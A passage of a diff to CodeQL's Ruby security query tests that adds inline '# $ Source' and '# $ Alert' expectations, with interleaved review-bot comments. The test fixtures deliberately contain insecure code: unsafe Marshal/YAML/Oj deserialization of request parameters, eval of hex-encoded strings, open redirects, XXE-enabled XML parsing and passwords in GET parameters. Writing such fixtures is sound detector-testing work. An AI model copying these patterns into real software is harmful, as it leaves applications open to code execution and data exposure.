| UnsafeDeserialization.rb:167:24:167:32 | call to read | value from stdin | -| UnsafeDeserialization.rb:170:24:170:27 | call to gets | UnsafeDeserialization.rb:170:24:170:27 | call to gets | UnsafeDeserialization.rb:170:24:170:27 | call to gets | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:170:24:170:27 | call to gets | value from stdin | -| UnsafeDeserialization.rb:173:24:173:32 | call to readlines | UnsafeDeserialization.rb:173:24:173:32 | call to readlines | UnsafeDeserialization.rb:173:24:173:32 | call to readlines | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:173:24:173:32 | call to readlines | value from stdin | diff --git a/ruby/ql/test/query-tests/security/cwe-502/unsafe-deserialization/UnsafeDeserialization.qlref b/ruby/ql/test/query-tests/security/cwe-502/unsafe-deserialization/UnsafeDeserialization.qlref index 55f7c440b46e..12e3c7a9b6ca 100644 --- a/ruby/ql/test/query-tests/security/cwe-502/unsafe-deserialization/UnsafeDeserialization.qlref +++ b/ruby/ql/test/query-tests/security/cwe-502/unsafe-deserialization/UnsafeDeserialization.qlref @@ -1 +1,2 @@ -queries/security/cwe-502/UnsafeDeserialization.ql +query: queries/security/cwe-502/UnsafeDeserialization.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ruby/ql/test/query-tests/security/cwe-502/unsafe-deserialization/UnsafeDeserialization.rb b/ruby/ql/test/query-tests/security/cwe-502/unsafe-deserialization/UnsafeDeserialization.rb index 633a99c14fbb..b019bc0cb0e0 100644 --- a/ruby/ql/test/query-tests/security/cwe-502/unsafe-deserialization/UnsafeDeserialization.rb +++ b/ruby/ql/test/query-tests/security/cwe-502/unsafe-deserialization/UnsafeDeserialization.rb 
@@ -8,26 +8,26 @@ class UsersController < ActionController::Base # BAD def route0 - serialized_data = Base64.decode64 params[:key] - object = Marshal.load serialized_data + serialized_data = Base64.decode64 params[:key] # $ Source + object = Marshal.load serialized_data # $ Alert end # BAD def route1 - serialized_data = Base64.decode64 params[:key] - object = Marshal.restore serialized_data + serialized_data = Base64.decode64 params[:key] # $ Source + object = Marshal.restore serialized_data # $ Alert end # BAD def route2 - json_data = params[:key] - object = JSON.load json_data + json_data = params[:key] # $ Source + object = JSON.load json_data # $ Alert end # BAD def route3 - json_data = params[:key] - object = JSON.restore json_data + json_data = params[:key] # $ Source + object = JSON.restore json_data # $ Alert end # GOOD - JSON.parse is safe to use on untrusted data @@ -38,8 +38,8 @@ def route4 # BAD def route5 - yaml_data = params[:key] - object = YAML.load yaml_data + yaml_data = params[:key] # $ Source + object = YAML.load yaml_data # $ Alert end # GOOD @@ -50,14 +50,14 @@ def route6 # BAD - Oj.load is unsafe in its default :object mode def route7 - json_data = params[:key] - object = Oj.load json_data - object = Oj.load json_data, mode: :object + json_data = params[:key] # $ Source + object = Oj.load json_data # $ Alert + object = Oj.load json_data, mode: :object # $ Alert end # GOOD - Oj.load is safe in any other mode def route8 - json_data = params[:key] + json_data = params[:key] # $ Source # Test the different ways the options hash can be passed options = { allow_blank: true, mode: :rails } object1 = Oj.load json_data, options @@ -67,7 +67,7 @@ def route8 # TODO: false positive; we aren't detecting flow from `:json` to the call argument. more_options = { allow_blank: true } more_options[:mode] = :json - object4 = Oj.load json_data, more_options + object4 = Oj.load json_data, more_options # $ Alert end # GOOD 
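Review bot: In the `@@ -67,7 +67,7 @@` hunk, `object4 = Oj.load json_data, more_options # $ Alert` records as an expected result something the TODO directly above it calls a false positive, inside a route labelled GOOD. The inline-expectations convention for a known false positive is the `SPURIOUS:` prefix, i.e. `object4 = Oj.load json_data, more_options # $ SPURIOUS: Alert`, so the annotation documents that the result is unwanted. The `# $ Source` added to route8's `json_data = params[:key]` in the preceding hunk appears to exist only because of this path and would benefit from a short comment saying so. route8's body starts outside this hunk.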
@@ -78,20 +78,20 @@ def route9 # BAD - Oj.object_load is always unsafe def route10 - json_data = params[:key] - object = Oj.object_load json_data + json_data = params[:key] # $ Source + object = Oj.object_load json_data # $ Alert end # BAD - Ox.parse_obj is always unsafe def route11 - xml_data = params[:key] - object = Ox.parse_obj xml_data + xml_data = params[:key] # $ Source + object = Ox.parse_obj xml_data # $ Alert end # BAD - Ox.load with :object mode is always unsafe def route12 - xml_data = params[:key] - object = Ox.load xml_data, mode: :object + xml_data = params[:key] # $ Source + object = Ox.load xml_data, mode: :object # $ Alert end # GOOD - Ox.load is safe in the default mode (which is :generic) and in any other mode than :object @@ -106,21 +106,21 @@ def route13 # BAD - `Hash.from_trusted_xml` will deserialize elements with the # `type="yaml"` attribute as YAML. def route14 - xml = params[:key] - hash = Hash.from_trusted_xml(xml) + xml = params[:key] # $ Source + hash = Hash.from_trusted_xml(xml) # $ Alert end # BAD before psych version 4.0.0 def route15 - yaml_data = params[:key] - object = Psych.load yaml_data + yaml_data = params[:key] # $ Source + object = Psych.load yaml_data # $ Alert object = Psych.load_file yaml_data end # GOOD In psych version 4.0.0 and above def route16 - yaml_data = params[:key] - object = Psych.load yaml_data + yaml_data = params[:key] # $ Source + object = Psych.load yaml_data # $ Alert object = Psych.load_file yaml_data end 
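Review bot: In the `@@ -106,21 +106,21 @@` hunk, route16 is commented `# GOOD In psych version 4.0.0 and above`, yet `object = Psych.load yaml_data` now carries a plain `# $ Alert`, so the comment and the expectation disagree. If the query cannot tell Psych versions apart and this result is accepted noise, mark it `# $ SPURIOUS: Alert`; otherwise update the comment to say the call is reported regardless of version. The unannotated `object = Psych.load_file yaml_data` lines in route15 and route16 would also benefit from a one-line comment stating why no alert is expected there, since `Psych.unsafe_load_file(yaml_data)` in route18 is annotated.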
@@ -134,21 +134,21 @@ def route17 # BAD def route18 - yaml_data = params[:key] - object = Psych.unsafe_load(yaml_data) - object = Psych.unsafe_load_file(yaml_data) - object = Psych.load_stream(yaml_data) + yaml_data = params[:key] # $ Source + object = Psych.unsafe_load(yaml_data) # $ Alert + object = Psych.unsafe_load_file(yaml_data) # $ Alert + object = Psych.load_stream(yaml_data) # $ Alert parse_output = Psych.parse_stream(yaml_data) - object = parse_output.to_ruby - object = Psych.parse(yaml_data).to_ruby - object = Psych.parse_file(yaml_data).to_ruby + object = parse_output.to_ruby # $ Alert + object = Psych.parse(yaml_data).to_ruby # $ Alert + object = Psych.parse_file(yaml_data).to_ruby # $ Alert end # BAD def route19 - plist_data = params[:key] - result = Plist.parse_xml(plist_data) - result = Plist.parse_xml(plist_data, marshal: true) + plist_data = params[:key] # $ Source + result = Plist.parse_xml(plist_data) # $ Alert + result = Plist.parse_xml(plist_data, marshal: true) # $ Alert end # GOOD @@ -158,18 +158,18 @@ def route20 end def stdin - object = YAML.load $stdin.read + object = YAML.load $stdin.read # $ Alert # STDIN - object = YAML.load STDIN.gets + object = YAML.load STDIN.gets # $ Alert # ARGF - object = YAML.load ARGF.read + object = YAML.load ARGF.read # $ Alert # Kernel.gets - object = YAML.load gets + object = YAML.load gets # $ Alert # Kernel.readlines - object = YAML.load readlines + object = YAML.load readlines # $ Alert end end \ No newline at end of file diff --git a/ruby/ql/test/query-tests/security/cwe-506/HardcodedDataInterpretedAsCode.expected b/ruby/ql/test/query-tests/security/cwe-506/HardcodedDataInterpretedAsCode.expected index 2935e15cbd6e..fe3a1d20a041 100644 --- a/ruby/ql/test/query-tests/security/cwe-506/HardcodedDataInterpretedAsCode.expected +++ b/ruby/ql/test/query-tests/security/cwe-506/HardcodedDataInterpretedAsCode.expected 
@@ -1,3 +1,7 @@ +#select +| tst.rb:7:6:7:31 | call to e | tst.rb:5:27:5:72 | "707574732822636f646520696e6a6..." : String | tst.rb:7:6:7:31 | call to e | $@ is interpreted as code. | tst.rb:5:27:5:72 | "707574732822636f646520696e6a6..." | Hard-coded data | +| tst.rb:10:9:10:25 | call to e | tst.rb:10:11:10:24 | "666f6f626172" : String | tst.rb:10:9:10:25 | call to e | $@ is interpreted as an import path. | tst.rb:10:11:10:24 | "666f6f626172" | Hard-coded data | +| tst.rb:17:6:17:38 | call to strip | tst.rb:16:31:16:84 | "\\x70\\x75\\x74\\x73\\x28\\x27\\x68\\..." : String | tst.rb:17:6:17:38 | call to strip | $@ is interpreted as code. | tst.rb:16:31:16:84 | "\\x70\\x75\\x74\\x73\\x28\\x27\\x68\\..." | Hard-coded data | edges | tst.rb:1:7:1:7 | r : String | tst.rb:2:4:2:4 | r : String | provenance | | | tst.rb:2:3:2:5 | call to [] : Array [element 0] : String | tst.rb:2:3:2:15 | call to pack | provenance | Config | @@ -29,7 +33,3 @@ nodes subpaths | tst.rb:7:8:7:30 | totally_harmless_string : String | tst.rb:1:7:1:7 | r : String | tst.rb:2:3:2:15 | call to pack | tst.rb:7:6:7:31 | call to e | | tst.rb:10:11:10:24 | "666f6f626172" : String | tst.rb:1:7:1:7 | r : String | tst.rb:2:3:2:15 | call to pack | tst.rb:10:9:10:25 | call to e | -#select -| tst.rb:7:6:7:31 | call to e | tst.rb:5:27:5:72 | "707574732822636f646520696e6a6..." : String | tst.rb:7:6:7:31 | call to e | $@ is interpreted as code. | tst.rb:5:27:5:72 | "707574732822636f646520696e6a6..." | Hard-coded data | -| tst.rb:10:9:10:25 | call to e | tst.rb:10:11:10:24 | "666f6f626172" : String | tst.rb:10:9:10:25 | call to e | $@ is interpreted as an import path. | tst.rb:10:11:10:24 | "666f6f626172" | Hard-coded data | -| tst.rb:17:6:17:38 | call to strip | tst.rb:16:31:16:84 | "\\x70\\x75\\x74\\x73\\x28\\x27\\x68\\..." : String | tst.rb:17:6:17:38 | call to strip | $@ is interpreted as code. | tst.rb:16:31:16:84 | "\\x70\\x75\\x74\\x73\\x28\\x27\\x68\\..." | Hard-coded data | 
diff --git a/ruby/ql/test/query-tests/security/cwe-506/HardcodedDataInterpretedAsCode.qlref b/ruby/ql/test/query-tests/security/cwe-506/HardcodedDataInterpretedAsCode.qlref index afa4fec282c5..48494558b680 100644 --- a/ruby/ql/test/query-tests/security/cwe-506/HardcodedDataInterpretedAsCode.qlref +++ b/ruby/ql/test/query-tests/security/cwe-506/HardcodedDataInterpretedAsCode.qlref @@ -1 +1,2 @@ -queries/security/cwe-506/HardcodedDataInterpretedAsCode.ql +query: queries/security/cwe-506/HardcodedDataInterpretedAsCode.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ruby/ql/test/query-tests/security/cwe-506/tst.rb b/ruby/ql/test/query-tests/security/cwe-506/tst.rb index 67d117e95c49..bcc2c61f027a 100644 --- a/ruby/ql/test/query-tests/security/cwe-506/tst.rb +++ b/ruby/ql/test/query-tests/security/cwe-506/tst.rb @@ -2,17 +2,17 @@ def e(r) [r].pack 'H*' end -totally_harmless_string = '707574732822636f646520696e6a656374696f6e2229' +totally_harmless_string = '707574732822636f646520696e6a656374696f6e2229' # $ Source -eval(e(totally_harmless_string)) # NOT OK: eval("puts('hello'") +eval(e(totally_harmless_string)) # NOT OK: eval("puts('hello'") # $ Alert eval(totally_harmless_string) # OK: throws parse error -require e('666f6f626172') # NOT OK: require 'foobar' +require e('666f6f626172') # NOT OK: require 'foobar' # $ Alert require '666f6f626172' # OK: no taint step between source and sink x = 'deadbeef' require e(x) # OK: doesn't meet our criteria for being a source -another_questionable_string = "\x70\x75\x74\x73\x28\x27\x68\x65\x6C\x6C\x6F\x27\x29" -eval(another_questionable_string.strip) # NOT OK: eval("puts('hello'") +another_questionable_string = "\x70\x75\x74\x73\x28\x27\x68\x65\x6C\x6C\x6F\x27\x29" # $ Source +eval(another_questionable_string.strip) # NOT OK: eval("puts('hello'") # $ Alert eval(another_questionable_string) # OK: no taint step between source and sink 
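Review bot: The comment kept on `eval(e(totally_harmless_string))` in `tst.rb` says `eval("puts('hello'")`, but the hex literal on the `# $ Source` line decodes to `puts("code injection")`; only the `\x70…` string further down is `puts('hello')`. Since the line is being touched anyway, correct it to `# NOT OK: eval('puts("code injection")')`. Separately, the expectation is appended after existing comment text here (`# NOT OK: … # $ Alert`) and in the `users_controller.rb` hunk that follows (`# BAD: … # $ Alert`). It is worth confirming that the Ruby inline-expectations parser accepts a `$` marker that is not at the start of the comment; if it does not, the legacy `NOT OK`/`BAD` text should be replaced by the annotation rather than followed by it.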
diff --git a/ruby/ql/test/query-tests/security/cwe-598/SensitiveGetQuery.qlref b/ruby/ql/test/query-tests/security/cwe-598/SensitiveGetQuery.qlref index 98d0d8e6be71..1488e6145ba9 100644 --- a/ruby/ql/test/query-tests/security/cwe-598/SensitiveGetQuery.qlref +++ b/ruby/ql/test/query-tests/security/cwe-598/SensitiveGetQuery.qlref @@ -1 +1,2 @@ -queries/security/cwe-598/SensitiveGetQuery.ql \ No newline at end of file +query: queries/security/cwe-598/SensitiveGetQuery.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ruby/ql/test/query-tests/security/cwe-598/app/controllers/users_controller.rb b/ruby/ql/test/query-tests/security/cwe-598/app/controllers/users_controller.rb index 441d8b493ab4..3fefc82a0922 100644 --- a/ruby/ql/test/query-tests/security/cwe-598/app/controllers/users_controller.rb +++ b/ruby/ql/test/query-tests/security/cwe-598/app/controllers/users_controller.rb @@ -1,17 +1,17 @@ class UsersController < ApplicationController def login_get_1 - foo = params[:password] # BAD: route handler uses GET query parameters to receive sensitive data + foo = params[:password] # BAD: route handler uses GET query parameters to receive sensitive data # $ Alert authenticate_user(params[:username], foo) end def login_get_2 - password = params[:foo] # BAD: route handler uses GET query parameters to receive sensitive data + password = params[:foo] # BAD: route handler uses GET query parameters to receive sensitive data # $ Alert authenticate_user(params[:username], password) end def login_get_3 - @password = params[:foo] # BAD: route handler uses GET query parameters to receive sensitive data + @password = params[:foo] # BAD: route handler uses GET query parameters to receive sensitive data # $ Alert authenticate_user(params[:username], @password) end diff --git a/ruby/ql/test/query-tests/security/cwe-601/UrlRedirect.expected b/ruby/ql/test/query-tests/security/cwe-601/UrlRedirect.expected index cd2845ea7a56..7df096e2d2fa 100644 
--- a/ruby/ql/test/query-tests/security/cwe-601/UrlRedirect.expected
+++ b/ruby/ql/test/query-tests/security/cwe-601/UrlRedirect.expected
@@ -1,3 +1,14 @@ +#select +| UrlRedirect.rb:4:17:4:22 | call to params | UrlRedirect.rb:4:17:4:22 | call to params | UrlRedirect.rb:4:17:4:22 | call to params | Untrusted URL redirection depends on a $@. | UrlRedirect.rb:4:17:4:22 | call to params | user-provided value | +| UrlRedirect.rb:9:17:9:28 | ...[...] | UrlRedirect.rb:9:17:9:22 | call to params | UrlRedirect.rb:9:17:9:28 | ...[...] | Untrusted URL redirection depends on a $@. | UrlRedirect.rb:9:17:9:22 | call to params | user-provided value | +| UrlRedirect.rb:14:17:14:43 | call to fetch | UrlRedirect.rb:14:17:14:22 | call to params | UrlRedirect.rb:14:17:14:43 | call to fetch | Untrusted URL redirection depends on a $@. | UrlRedirect.rb:14:17:14:22 | call to params | user-provided value | +| UrlRedirect.rb:19:17:19:37 | call to to_unsafe_hash | UrlRedirect.rb:19:17:19:22 | call to params | UrlRedirect.rb:19:17:19:37 | call to to_unsafe_hash | Untrusted URL redirection depends on a $@. | UrlRedirect.rb:19:17:19:22 | call to params | user-provided value | +| UrlRedirect.rb:24:17:24:37 | call to filter_params | UrlRedirect.rb:24:31:24:36 | call to params | UrlRedirect.rb:24:17:24:37 | call to filter_params | Untrusted URL redirection depends on a $@. | UrlRedirect.rb:24:31:24:36 | call to params | user-provided value | +| UrlRedirect.rb:34:17:34:37 | "#{...}/foo" | UrlRedirect.rb:34:20:34:25 | call to params | UrlRedirect.rb:34:17:34:37 | "#{...}/foo" | Untrusted URL redirection depends on a $@. | UrlRedirect.rb:34:20:34:25 | call to params | user-provided value | +| UrlRedirect.rb:58:17:58:28 | ...[...] | UrlRedirect.rb:58:17:58:22 | call to params | UrlRedirect.rb:58:17:58:28 | ...[...] | Untrusted URL redirection depends on a $@. | UrlRedirect.rb:58:17:58:22 | call to params | user-provided value | +| UrlRedirect.rb:63:38:63:49 | ...[...] | UrlRedirect.rb:63:38:63:43 | call to params | UrlRedirect.rb:63:38:63:49 | ...[...] | Untrusted URL redirection depends on a $@. 
| UrlRedirect.rb:63:38:63:43 | call to params | user-provided value | +| UrlRedirect.rb:68:38:68:49 | ...[...] | UrlRedirect.rb:68:38:68:43 | call to params | UrlRedirect.rb:68:38:68:49 | ...[...] | Untrusted URL redirection depends on a $@. | UrlRedirect.rb:68:38:68:43 | call to params | user-provided value | +| UrlRedirect.rb:73:25:73:36 | ...[...] | UrlRedirect.rb:73:25:73:30 | call to params | UrlRedirect.rb:73:25:73:36 | ...[...] | Untrusted URL redirection depends on a $@. | UrlRedirect.rb:73:25:73:30 | call to params | user-provided value | edges | UrlRedirect.rb:9:17:9:22 | call to params | UrlRedirect.rb:9:17:9:28 | ...[...] | provenance | | | UrlRedirect.rb:14:17:14:22 | call to params | UrlRedirect.rb:14:17:14:43 | call to fetch | provenance | | 
@@ -40,14 +51,3 @@ nodes | UrlRedirect.rb:94:5:94:29 | call to permit | semmle.label | call to permit | subpaths | UrlRedirect.rb:24:31:24:36 | call to params | UrlRedirect.rb:93:21:93:32 | input_params | UrlRedirect.rb:94:5:94:29 | call to permit | UrlRedirect.rb:24:17:24:37 | call to filter_params | -#select -| UrlRedirect.rb:4:17:4:22 | call to params | UrlRedirect.rb:4:17:4:22 | call to params | UrlRedirect.rb:4:17:4:22 | call to params | Untrusted URL redirection depends on a $@. | UrlRedirect.rb:4:17:4:22 | call to params | user-provided value | -| UrlRedirect.rb:9:17:9:28 | ...[...] | UrlRedirect.rb:9:17:9:22 | call to params | UrlRedirect.rb:9:17:9:28 | ...[...] | Untrusted URL redirection depends on a $@. | UrlRedirect.rb:9:17:9:22 | call to params | user-provided value | -| UrlRedirect.rb:14:17:14:43 | call to fetch | UrlRedirect.rb:14:17:14:22 | call to params | UrlRedirect.rb:14:17:14:43 | call to fetch | Untrusted URL redirection depends on a $@. | UrlRedirect.rb:14:17:14:22 | call to params | user-provided value | -| UrlRedirect.rb:19:17:19:37 | call to to_unsafe_hash | UrlRedirect.rb:19:17:19:22 | call to params | UrlRedirect.rb:19:17:19:37 | call to to_unsafe_hash | Untrusted URL redirection depends on a $@. | UrlRedirect.rb:19:17:19:22 | call to params | user-provided value | -| UrlRedirect.rb:24:17:24:37 | call to filter_params | UrlRedirect.rb:24:31:24:36 | call to params | UrlRedirect.rb:24:17:24:37 | call to filter_params | Untrusted URL redirection depends on a $@. | UrlRedirect.rb:24:31:24:36 | call to params | user-provided value | -| UrlRedirect.rb:34:17:34:37 | "#{...}/foo" | UrlRedirect.rb:34:20:34:25 | call to params | UrlRedirect.rb:34:17:34:37 | "#{...}/foo" | Untrusted URL redirection depends on a $@. | UrlRedirect.rb:34:20:34:25 | call to params | user-provided value | -| UrlRedirect.rb:58:17:58:28 | ...[...] | UrlRedirect.rb:58:17:58:22 | call to params | UrlRedirect.rb:58:17:58:28 | ...[...] 
| Untrusted URL redirection depends on a $@. | UrlRedirect.rb:58:17:58:22 | call to params | user-provided value | -| UrlRedirect.rb:63:38:63:49 | ...[...] | UrlRedirect.rb:63:38:63:43 | call to params | UrlRedirect.rb:63:38:63:49 | ...[...] | Untrusted URL redirection depends on a $@. | UrlRedirect.rb:63:38:63:43 | call to params | user-provided value | -| UrlRedirect.rb:68:38:68:49 | ...[...] | UrlRedirect.rb:68:38:68:43 | call to params | UrlRedirect.rb:68:38:68:49 | ...[...] | Untrusted URL redirection depends on a $@. | UrlRedirect.rb:68:38:68:43 | call to params | user-provided value | -| UrlRedirect.rb:73:25:73:36 | ...[...] | UrlRedirect.rb:73:25:73:30 | call to params | UrlRedirect.rb:73:25:73:36 | ...[...] | Untrusted URL redirection depends on a $@. | UrlRedirect.rb:73:25:73:30 | call to params | user-provided value | diff --git a/ruby/ql/test/query-tests/security/cwe-601/UrlRedirect.qlref b/ruby/ql/test/query-tests/security/cwe-601/UrlRedirect.qlref index 422dc00837aa..76f39c8d6f3d 100644 --- a/ruby/ql/test/query-tests/security/cwe-601/UrlRedirect.qlref +++ b/ruby/ql/test/query-tests/security/cwe-601/UrlRedirect.qlref @@ -1 +1,2 @@ -queries/security/cwe-601/UrlRedirect.ql +query: queries/security/cwe-601/UrlRedirect.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ruby/ql/test/query-tests/security/cwe-601/UrlRedirect.rb b/ruby/ql/test/query-tests/security/cwe-601/UrlRedirect.rb index 78f2248434b1..f44cef2b558e 100644 --- a/ruby/ql/test/query-tests/security/cwe-601/UrlRedirect.rb +++ b/ruby/ql/test/query-tests/security/cwe-601/UrlRedirect.rb 
@@ -1,27 +1,27 @@ class UsersController < ActionController::Base # BAD def route1 - redirect_to params + redirect_to params # $ Alert end # BAD def route2 - redirect_to params[:key] + redirect_to params[:key] # $ Alert end # BAD def route3 - redirect_to params.fetch(:specific_arg) + redirect_to params.fetch(:specific_arg) # $ Alert end # BAD def route4 - redirect_to params.to_unsafe_hash + redirect_to params.to_unsafe_hash # $ Alert end # BAD def route5 - redirect_to filter_params(params) + redirect_to filter_params(params) # $ Alert end # GOOD @@ -31,7 +31,7 @@ def route6 # BAD def route7 - redirect_to "#{params[:key]}/foo" + redirect_to "#{params[:key]}/foo" # $ Alert end # GOOD @@ -55,22 +55,22 @@ def create1 # The same as `create1` but this is reachable via a GET request, as configured # by the routes at the bottom of this file. def route9 - redirect_to params[:key] + redirect_to params[:key] # $ Alert end # BAD def route10 - redirect_back fallback_location: params[:key] + redirect_back fallback_location: params[:key] # $ Alert end # BAD def route11 - redirect_back fallback_location: params[:key], allow_other_host: true + redirect_back fallback_location: params[:key], allow_other_host: true # $ Alert end # BAD def route12 - redirect_back_or_to params[:key] + redirect_back_or_to params[:key] # $ Alert end # GOOD diff --git a/ruby/ql/test/query-tests/security/cwe-611/libxml-backend/LibXmlBackend.rb b/ruby/ql/test/query-tests/security/cwe-611/libxml-backend/LibXmlBackend.rb index 4e3565e149a2..c7013082c77e 100644 --- a/ruby/ql/test/query-tests/security/cwe-611/libxml-backend/LibXmlBackend.rb +++ b/ruby/ql/test/query-tests/security/cwe-611/libxml-backend/LibXmlBackend.rb 
@@ -13,11 +13,11 @@ def self.default_substitute_entities class LibXmlRubyXXE < ApplicationController def foo - content = params[:xml] + content = params[:xml] # $ Source - LibXML::XML::Parser.file(content, { options: 2048 }) - Hash.from_xml(content) - Hash.from_trusted_xml(content) - ActiveSupport::XmlMini.parse(content) + LibXML::XML::Parser.file(content, { options: 2048 }) # $ Alert + Hash.from_xml(content) # $ Alert + Hash.from_trusted_xml(content) # $ Alert + ActiveSupport::XmlMini.parse(content) # $ Alert end end diff --git a/ruby/ql/test/query-tests/security/cwe-611/libxml-backend/Xxe.expected b/ruby/ql/test/query-tests/security/cwe-611/libxml-backend/Xxe.expected index d819e92c9305..787038e80f2b 100644 --- a/ruby/ql/test/query-tests/security/cwe-611/libxml-backend/Xxe.expected +++ b/ruby/ql/test/query-tests/security/cwe-611/libxml-backend/Xxe.expected 
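Review bot: `LibXML::XML::Parser.file(content, { options: 2048 }) # $ Alert` in `foo` has no comment explaining why an alert is expected, while the identical call in `xxe/LibXmlRuby.rb` is marked `# OK`. The difference presumably comes from the `default_substitute_entities` setup that is visible only in the hunk header, so a short comment would stop a reader from treating one of the two as a mistake, e.g. `# entity substitution is on by default in this test's backend, so options without NOENT are still reported`. The class body starts outside the hunk, so the exact setup should be checked before wording the comment.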
@@ -1,3 +1,8 @@ +#select +| LibXmlBackend.rb:18:30:18:36 | content | LibXmlBackend.rb:16:15:16:20 | call to params | LibXmlBackend.rb:18:30:18:36 | content | XML parsing depends on a $@ without guarding against external entity expansion. | LibXmlBackend.rb:16:15:16:20 | call to params | user-provided value | +| LibXmlBackend.rb:19:19:19:25 | content | LibXmlBackend.rb:16:15:16:20 | call to params | LibXmlBackend.rb:19:19:19:25 | content | XML parsing depends on a $@ without guarding against external entity expansion. | LibXmlBackend.rb:16:15:16:20 | call to params | user-provided value | +| LibXmlBackend.rb:20:27:20:33 | content | LibXmlBackend.rb:16:15:16:20 | call to params | LibXmlBackend.rb:20:27:20:33 | content | XML parsing depends on a $@ without guarding against external entity expansion. | LibXmlBackend.rb:16:15:16:20 | call to params | user-provided value | +| LibXmlBackend.rb:21:34:21:40 | content | LibXmlBackend.rb:16:15:16:20 | call to params | LibXmlBackend.rb:21:34:21:40 | content | XML parsing depends on a $@ without guarding against external entity expansion. | LibXmlBackend.rb:16:15:16:20 | call to params | user-provided value | edges | LibXmlBackend.rb:16:5:16:11 | content | LibXmlBackend.rb:18:30:18:36 | content | provenance | | | LibXmlBackend.rb:16:5:16:11 | content | LibXmlBackend.rb:19:19:19:25 | content | provenance | | 
@@ -14,8 +19,3 @@ nodes | LibXmlBackend.rb:20:27:20:33 | content | semmle.label | content | | LibXmlBackend.rb:21:34:21:40 | content | semmle.label | content | subpaths -#select -| LibXmlBackend.rb:18:30:18:36 | content | LibXmlBackend.rb:16:15:16:20 | call to params | LibXmlBackend.rb:18:30:18:36 | content | XML parsing depends on a $@ without guarding against external entity expansion. | LibXmlBackend.rb:16:15:16:20 | call to params | user-provided value | -| LibXmlBackend.rb:19:19:19:25 | content | LibXmlBackend.rb:16:15:16:20 | call to params | LibXmlBackend.rb:19:19:19:25 | content | XML parsing depends on a $@ without guarding against external entity expansion. | LibXmlBackend.rb:16:15:16:20 | call to params | user-provided value | -| LibXmlBackend.rb:20:27:20:33 | content | LibXmlBackend.rb:16:15:16:20 | call to params | LibXmlBackend.rb:20:27:20:33 | content | XML parsing depends on a $@ without guarding against external entity expansion. | LibXmlBackend.rb:16:15:16:20 | call to params | user-provided value | -| LibXmlBackend.rb:21:34:21:40 | content | LibXmlBackend.rb:16:15:16:20 | call to params | LibXmlBackend.rb:21:34:21:40 | content | XML parsing depends on a $@ without guarding against external entity expansion. | LibXmlBackend.rb:16:15:16:20 | call to params | user-provided value | diff --git a/ruby/ql/test/query-tests/security/cwe-611/libxml-backend/Xxe.qlref b/ruby/ql/test/query-tests/security/cwe-611/libxml-backend/Xxe.qlref index 8ed653a4869f..50d9b176008c 100644 --- a/ruby/ql/test/query-tests/security/cwe-611/libxml-backend/Xxe.qlref +++ b/ruby/ql/test/query-tests/security/cwe-611/libxml-backend/Xxe.qlref @@ -1 +1,2 @@ -queries/security/cwe-611/Xxe.ql +query: queries/security/cwe-611/Xxe.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ruby/ql/test/query-tests/security/cwe-611/xxe/LibXmlRuby.rb b/ruby/ql/test/query-tests/security/cwe-611/xxe/LibXmlRuby.rb index a8d640d62c6a..2e38a92330fa 100644 
--- a/ruby/ql/test/query-tests/security/cwe-611/xxe/LibXmlRuby.rb +++ b/ruby/ql/test/query-tests/security/cwe-611/xxe/LibXmlRuby.rb @@ -1,15 +1,15 @@ class LibXmlRubyXXE < ApplicationController - content = params[:xml] - LibXML::XML::Document.string(content, { options: 2 | 2048, encoding: 'utf-8' }) - LibXML::XML::Document.file(content, { options: LibXML::XML::Parser::Options::NOENT | 2048}) - LibXML::XML::Document.io(content, { options: XML::Parser::Options::NOENT | 2048 }) - LibXML::XML::Parser.string(content, { options: 2 | 2048 }) - LibXML::XML::Parser.file(content, { options: 3 | 2048 }) - LibXML::XML::Parser.io(content, { options: 2 | 2048}) + content = params[:xml] # $ Source + LibXML::XML::Document.string(content, { options: 2 | 2048, encoding: 'utf-8' }) # $ Alert + LibXML::XML::Document.file(content, { options: LibXML::XML::Parser::Options::NOENT | 2048}) # $ Alert + LibXML::XML::Document.io(content, { options: XML::Parser::Options::NOENT | 2048 }) # $ Alert + LibXML::XML::Parser.string(content, { options: 2 | 2048 }) # $ Alert + LibXML::XML::Parser.file(content, { options: 3 | 2048 }) # $ Alert + LibXML::XML::Parser.io(content, { options: 2 | 2048}) # $ Alert - XML::Document.string(content, { options: 2 | 2048 }) - XML::Parser.string(content, { options: 2 | 2048 }) + XML::Document.string(content, { options: 2 | 2048 }) # $ Alert + XML::Parser.string(content, { options: 2 | 2048 }) # $ Alert LibXML::XML::Parser.file(content, { options: 2048 }) # OK diff --git a/ruby/ql/test/query-tests/security/cwe-611/xxe/Nokogiri.rb b/ruby/ql/test/query-tests/security/cwe-611/xxe/Nokogiri.rb index 76f37cfb751e..c4b03ad2645a 100644 --- a/ruby/ql/test/query-tests/security/cwe-611/xxe/Nokogiri.rb +++ b/ruby/ql/test/query-tests/security/cwe-611/xxe/Nokogiri.rb 
@@ -1,30 +1,30 @@ class NokogiriXXE < ApplicationController - content = params[:xml] + content = params[:xml] # $ Source - Nokogiri::XML::parse(content, nil, nil, 2) - Nokogiri::XML::parse(content, nil, nil, 1 | 2) - Nokogiri::XML::parse(content, nil, nil, 1 & ~Nokogiri::XML::ParseOptions::NONET) - Nokogiri::XML::parse(content, nil, nil, Nokogiri::XML::ParseOptions::NOENT) - Nokogiri::XML::parse(content, nil, nil, Nokogiri::XML::ParseOptions::DTDLOAD) + Nokogiri::XML::parse(content, nil, nil, 2) # $ Alert + Nokogiri::XML::parse(content, nil, nil, 1 | 2) # $ Alert + Nokogiri::XML::parse(content, nil, nil, 1 & ~Nokogiri::XML::ParseOptions::NONET) # $ Alert + Nokogiri::XML::parse(content, nil, nil, Nokogiri::XML::ParseOptions::NOENT) # $ Alert + Nokogiri::XML::parse(content, nil, nil, Nokogiri::XML::ParseOptions::DTDLOAD) # $ Alert Nokogiri::XML::parse(content, nil, nil, ~Nokogiri::XML::ParseOptions::NOENT) #OK - Nokogiri::XML::parse(content, nil, nil, ~Nokogiri::XML::ParseOptions::NONET) - Nokogiri::XML::parse(content, nil, nil, Nokogiri::XML::ParseOptions.new 2) + Nokogiri::XML::parse(content, nil, nil, ~Nokogiri::XML::ParseOptions::NONET) # $ Alert + Nokogiri::XML::parse(content, nil, nil, 